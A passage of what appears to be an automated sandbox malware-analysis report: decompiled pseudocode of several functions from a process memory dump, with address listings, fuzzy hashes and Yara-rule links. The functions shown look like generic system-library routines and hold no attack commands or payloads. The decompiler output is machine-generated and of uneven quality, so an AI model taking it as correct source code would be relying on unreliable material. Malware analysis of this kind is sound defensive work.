                                                                                            0x04d57055
                                                                                            0x04d5705a
                                                                                            0x04d57062
                                                                                            0x04d57062
                                                                                            0x04d5705a
                                                                                            0x04d57064
                                                                                            0x04d57064
                                                                                            0x04d57067
                                                                                            0x04d57071
                                                                                            0x04d57096
                                                                                            0x04d5709b
                                                                                            0x04d570a2
                                                                                            0x04d570a6
                                                                                            0x04d570a7
                                                                                            0x04d570ad
                                                                                            0x04d570b3
                                                                                            0x04d570b6
                                                                                            0x04d570bb
                                                                                            0x04d570c3
                                                                                            0x04d570c3
                                                                                            0x04d570c6
                                                                                            0x04d570cd
                                                                                            0x04d570dd
                                                                                            0x04d570e0
                                                                                            0x04d570e2
                                                                                            0x04d570e2
                                                                                            0x04d570ee
                                                                                            0x04d57101
                                                                                            0x04d570f0
                                                                                            0x04d570f9
                                                                                            0x04d570f9
                                                                                            0x04d5710a
                                                                                            0x04d5710e
                                                                                            0x04d57112
                                                                                            0x04d57117
                                                                                            0x04d57118
                                                                                            0x04d57118
                                                                                            0x04d570bb
                                                                                            0x04d5711d
                                                                                            0x04d57123
                                                                                            0x04d57131
                                                                                            0x04d57131
                                                                                            0x04d57136
                                                                                            0x04d5713d
                                                                                            0x04d5713e
                                                                                            0x04d5713f
                                                                                            0x04d5714a
                                                                                            0x04d5714a
                                                                                            0x04d57084
                                                                                            0x04d57088
                                                                                            0x00000000
                                                                                            0x04d5708e
                                                                                            0x04d5708e
                                                                                            0x04d57092
                                                                                            0x00000000
                                                                                            0x04d57092

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 516c2dd08d4013764fed3d6b4e92fa1e51c778f946d5f8def440d708b4050fde
                                                                                            • Instruction ID: 7cfea28fa0495b7f311f0d8a68cc8e815d7cffef1a0a7ccb0b7f07a883b518d2
                                                                                            • Opcode Fuzzy Hash: 516c2dd08d4013764fed3d6b4e92fa1e51c778f946d5f8def440d708b4050fde
                                                                                            • Instruction Fuzzy Hash: 8631A0726047519BC720DF68CC40E6AB3E9FF88700F144A29FC95876A0EB34F904CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFC182, Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E04CFC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04CF7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04DA8D34(_v8, _t80);
					}
					E04CF2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04CEFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04DA8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04CEFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04D1B180();
						if(_a4 != 0) {
							E04CF2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04CFBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04CFBB2D(_t16, _t15);
						E04CFB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04CEFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04CEFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04CEFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                            0x04cfc18d
                                                                                            0x04cfc18f
                                                                                            0x04cfc191
                                                                                            0x04cfc19b
                                                                                            0x04cfc1a0
                                                                                            0x04cfc1d4
                                                                                            0x04cfc1de
                                                                                            0x04d42d6e
                                                                                            0x04cfc1e4
                                                                                            0x04cfc1e4
                                                                                            0x04cfc1e4
                                                                                            0x04cfc1ec
                                                                                            0x04d42d7d
                                                                                            0x04d42d7d
                                                                                            0x04cfc1f3
                                                                                            0x04cfc1ff
                                                                                            0x04d42d88
                                                                                            0x04d42d8d
                                                                                            0x04d42d94
                                                                                            0x04d42d94
                                                                                            0x04d42d9f
                                                                                            0x04d42da4
                                                                                            0x04d42dab
                                                                                            0x04d42db0
                                                                                            0x04d42db2
                                                                                            0x04d42db3
                                                                                            0x04d42db4
                                                                                            0x04d42dbc
                                                                                            0x04d42dc3
                                                                                            0x04d42dc3
                                                                                            0x04cfc205
                                                                                            0x04cfc205
                                                                                            0x04cfc208
                                                                                            0x04cfc20e
                                                                                            0x04cfc211
                                                                                            0x04cfc216
                                                                                            0x04cfc219
                                                                                            0x04cfc21f
                                                                                            0x04cfc222
                                                                                            0x04cfc22c
                                                                                            0x04cfc234
                                                                                            0x04cfc23a
                                                                                            0x04cfc23f
                                                                                            0x04cfc245
                                                                                            0x04cfc24b
                                                                                            0x04cfc251
                                                                                            0x04cfc25a
                                                                                            0x04cfc276
                                                                                            0x04cfc27d
                                                                                            0x04cfc27d
                                                                                            0x04cfc25c
                                                                                            0x04cfc25c
                                                                                            0x00000000
                                                                                            0x04cfc25e
                                                                                            0x04cfc1a4
                                                                                            0x04cfc1aa
                                                                                            0x04cfc1b3
                                                                                            0x04cfc265
                                                                                            0x04cfc26c
                                                                                            0x04cfc26c
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction ID: 942d4ac50154effbc069d7d4632bbb263fd03d7e321a622fb6c9bad31f5b786e
                                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction Fuzzy Hash: 86311471B0154ABEE744EBB5C880BF9F7A6FF82208F08815AD61847241DB3D7A55E7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0A70E, Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E04D0A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4dc7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4dc7b10 = 8;
					 *0x4dc7b14 = 0x4dc7b0c;
					 *0x4dc7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04D0A990(0x4dc7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04D0A840(__edx, __ecx, __ecx, _t52, 0x4dc7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4dc7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4dc7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4dc7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04CF4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4dc7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04D1F3E0(_t50,  *0x4dc7b14, _t8 >> 3);
						_t28 =  *0x4dc7b14; // 0x77f07b0c
						__eflags = _t28 - 0x4dc7b0c;
						if(_t28 != 0x4dc7b0c) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4dc7b14 = _t50;
						_t48 = _v12;
						 *0x4dc7b10 = _t9;
						goto L6;
					}
					 *0x4dc7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                            0x04d0a713
                                                                                            0x04d0a714
                                                                                            0x04d0a717
                                                                                            0x04d0a71d
                                                                                            0x04d0a720
                                                                                            0x04d0a722
                                                                                            0x04d0a727
                                                                                            0x04d0a74a
                                                                                            0x04d0a754
                                                                                            0x04d0a75e
                                                                                            0x04d0a768
                                                                                            0x04d0a76a
                                                                                            0x04d0a773
                                                                                            0x04d0a78b
                                                                                            0x04d0a790
                                                                                            0x04d0a792
                                                                                            0x04d0a741
                                                                                            0x04d0a741
                                                                                            0x04d0a743
                                                                                            0x04d0a749
                                                                                            0x04d0a749
                                                                                            0x04d0a732
                                                                                            0x04d0a73a
                                                                                            0x04d0a797
                                                                                            0x04d0a79d
                                                                                            0x04d0a7a3
                                                                                            0x04d0a7a9
                                                                                            0x04d0a7b6
                                                                                            0x04d0a7bc
                                                                                            0x04d0a7ca
                                                                                            0x04d0a7e0
                                                                                            0x04d0a7e2
                                                                                            0x04d0a7e4
                                                                                            0x04d49bf2
                                                                                            0x00000000
                                                                                            0x04d49bf2
                                                                                            0x04d0a7ed
                                                                                            0x04d0a7f2
                                                                                            0x04d0a800
                                                                                            0x04d0a805
                                                                                            0x04d0a80d
                                                                                            0x04d0a812
                                                                                            0x04d49c08
                                                                                            0x04d49c08
                                                                                            0x04d0a818
                                                                                            0x04d0a81b
                                                                                            0x04d0a821
                                                                                            0x04d0a824
                                                                                            0x00000000
                                                                                            0x04d0a824
                                                                                            0x04d0a7ae
                                                                                            0x00000000
                                                                                            0x04d0a7ae
                                                                                            0x04d0a73c
                                                                                            0x04d0a73e
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ea1292473b76a5442d823f10ba16e1fc8807f15f3d6ac9b3e7549f6371da9c7b
                                                                                            • Instruction ID: 3540c12c0a5aa4160472e47e4563ec19ee9f9f5b4d0af29e49e29d802c42a055
                                                                                            • Opcode Fuzzy Hash: ea1292473b76a5442d823f10ba16e1fc8807f15f3d6ac9b3e7549f6371da9c7b
                                                                                            • Instruction Fuzzy Hash: FA3189B1600203ABD711CF18D8A0F6AB7FAFB94710F14895AE01587380E7B8BD01DFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D061A0, Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 97%
                                                                                            			E04D061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04D05E50(0x4cb67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04DA9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04CDF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                            0x04d061b3
                                                                                            0x04d061b5
                                                                                            0x04d061bd
                                                                                            0x04d061c3
                                                                                            0x04d061c7
                                                                                            0x04d061d2
                                                                                            0x04d061ff
                                                                                            0x04d061ff
                                                                                            0x04d06201
                                                                                            0x04d06207
                                                                                            0x04d06207
                                                                                            0x04d061d4
                                                                                            0x04d061d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d061df
                                                                                            0x04d061e2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d061e6
                                                                                            0x04d061e8
                                                                                            0x04d061ee
                                                                                            0x04d061ee
                                                                                            0x04d061f9
                                                                                            0x04d4762f
                                                                                            0x04d47632
                                                                                            0x04d47635
                                                                                            0x04d47639
                                                                                            0x04d47640
                                                                                            0x04d4766e
                                                                                            0x04d47675
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d47681
                                                                                            0x04d47689
                                                                                            0x04d4768d
                                                                                            0x04d47691
                                                                                            0x04d47695
                                                                                            0x04d47699
                                                                                            0x04d476af
                                                                                            0x04d476b5
                                                                                            0x04d476b7
                                                                                            0x04d476b7
                                                                                            0x04d476d7
                                                                                            0x04d476dc
                                                                                            0x00000000
                                                                                            0x04d476dc
                                                                                            0x04d476a2
                                                                                            0x04d476a9
                                                                                            0x04d47651
                                                                                            0x04d47653
                                                                                            0x04d47653
                                                                                            0x04d47656
                                                                                            0x04d47656
                                                                                            0x00000000
                                                                                            0x04d47656
                                                                                            0x04d47644
                                                                                            0x04d47646
                                                                                            0x04d47648
                                                                                            0x04d47648
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: da18d09520e0e8c677df60fcbfc63c50a39d2c7ffe62ac09501b31b31482d9b8
                                                                                            • Instruction ID: cdbe31155fd2d54715c0cd9f9a8b31592ffe18bdd64b71d18bd65235e0aefb62
                                                                                            • Opcode Fuzzy Hash: da18d09520e0e8c677df60fcbfc63c50a39d2c7ffe62ac09501b31b31482d9b8
                                                                                            • Instruction Fuzzy Hash: AB319E716053018FD3A0DF19C800B2AB7E6FF88B00F05896DE9989B391E7B0F804CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDAA16, Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 95%
                                                                                            			E04CDAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4dcd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4dc7b9c; // 0x0
					_t53 = L04CF4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04D1B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04D1F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04CE6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04D05E50(0x4cbc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04D0B230(_v32, _v28, 0x4cbc2d8, 1,  &_v24);
								_t28 = E04CDF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                            0x04cdaa25
                                                                                            0x04cdaa29
                                                                                            0x04cdaa2d
                                                                                            0x04cdaa30
                                                                                            0x04cdaa37
                                                                                            0x04cdaa3c
                                                                                            0x04d34458
                                                                                            0x04d34458
                                                                                            0x04d34472
                                                                                            0x04d34474
                                                                                            0x04d34476
                                                                                            0x04cdaa64
                                                                                            0x04cdaa74
                                                                                            0x04d3447c
                                                                                            0x04d34483
                                                                                            0x04d34492
                                                                                            0x04cdaa52
                                                                                            0x04cdaa54
                                                                                            0x04cdaa5e
                                                                                            0x04d344a8
                                                                                            0x04d344ad
                                                                                            0x04d344af
                                                                                            0x04d344b6
                                                                                            0x04d344b6
                                                                                            0x04d344b9
                                                                                            0x04d344bc
                                                                                            0x04d344cd
                                                                                            0x04d344d3
                                                                                            0x04d344d6
                                                                                            0x04d344e1
                                                                                            0x04d344e1
                                                                                            0x04d344e6
                                                                                            0x04d344e8
                                                                                            0x04d344fb
                                                                                            0x04d344fb
                                                                                            0x04d344e8
                                                                                            0x00000000
                                                                                            0x04cdaa5e
                                                                                            0x04d34476
                                                                                            0x04cdaa42
                                                                                            0x04cdaa46
                                                                                            0x04cdaa48
                                                                                            0x04cdaa4c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e94d38366c97a3ebff772637d21bedd748dc47241b89d5c67b12fb8b291a87b9
                                                                                            • Instruction ID: 499190e1627b0896c59bccb9c3f00086efcf780fc4fcf2a31094f2947cca0238
                                                                                            • Opcode Fuzzy Hash: e94d38366c97a3ebff772637d21bedd748dc47241b89d5c67b12fb8b291a87b9
                                                                                            • Instruction Fuzzy Hash: 6C31D471A00619ABDF109F64CD41ABFB7BAFF04704F05406AF905D7150E779B911DBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D18EC7, Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E04D18EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4dcd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04D04E70(0x4dc86e4, 0x4d19490, 0, 0);
					if( *0x4dc53e8 > 5 && E04D18F33(0x4dc53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4dc53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4dc53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4cbbc46;
						_t48 = E04D57B9C(0x4dc53e8, 0x4cbbc46, _t67, 0x4dc53e8, _t70,  &_v140);
					}
				}
				return E04D1B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                            0x04d18ec7
                                                                                            0x04d18ed9
                                                                                            0x04d18edc
                                                                                            0x04d18ee6
                                                                                            0x04d18ee9
                                                                                            0x04d18eee
                                                                                            0x04d18efc
                                                                                            0x04d18f08
                                                                                            0x04d51349
                                                                                            0x04d51353
                                                                                            0x04d5135d
                                                                                            0x04d51366
                                                                                            0x04d5136f
                                                                                            0x04d51375
                                                                                            0x04d5137c
                                                                                            0x04d51385
                                                                                            0x04d51390
                                                                                            0x04d51391
                                                                                            0x04d5139c
                                                                                            0x04d5139d
                                                                                            0x04d513a6
                                                                                            0x04d513ac
                                                                                            0x04d513b2
                                                                                            0x04d513b5
                                                                                            0x04d513bc
                                                                                            0x04d513bf
                                                                                            0x04d513c2
                                                                                            0x04d513c5
                                                                                            0x04d513c8
                                                                                            0x04d513cb
                                                                                            0x04d513ce
                                                                                            0x04d513d1
                                                                                            0x04d513d4
                                                                                            0x04d513d7
                                                                                            0x04d513da
                                                                                            0x04d513dd
                                                                                            0x04d513e0
                                                                                            0x04d513e3
                                                                                            0x04d513e6
                                                                                            0x04d513e9
                                                                                            0x04d513f6
                                                                                            0x04d51400
                                                                                            0x04d51400
                                                                                            0x04d18f08
                                                                                            0x04d18f32

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dba979355b0d7f2c47c7d36f1b1fc063ce11b1ae38b825e1c7d07f75f327b7d8
                                                                                            • Instruction ID: 881c0af83565d3e323d8eedd0b399f5c554871727e511b3b630a6f7fd9e5268c
                                                                                            • Opcode Fuzzy Hash: dba979355b0d7f2c47c7d36f1b1fc063ce11b1ae38b825e1c7d07f75f327b7d8
                                                                                            • Instruction Fuzzy Hash: 5341A3B1D00318AFDB10DFAAD980AADFBF5FB48314F5041AEE949A7240E774AA44CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D14A2C, Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 58%
                                                                                            			E04D14A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4dcd360 ^ _t62;
				_v8 =  *0x4dcd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04CF2280(_t26, 0x4dc8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04CEFFB0(_t41, _t51, 0x4dc8608);
						L2:
						 *0x4dcb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04D1B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04CF2280(_t28, 0x4dc8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04CEFFB0(_t42, _t53, 0x4dc8608);
							if(_t53 != 0) {
								L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04CEFFB0(_t41, _t51, 0x4dc8608);
						_t29 = _t58;
						goto L5;
					}
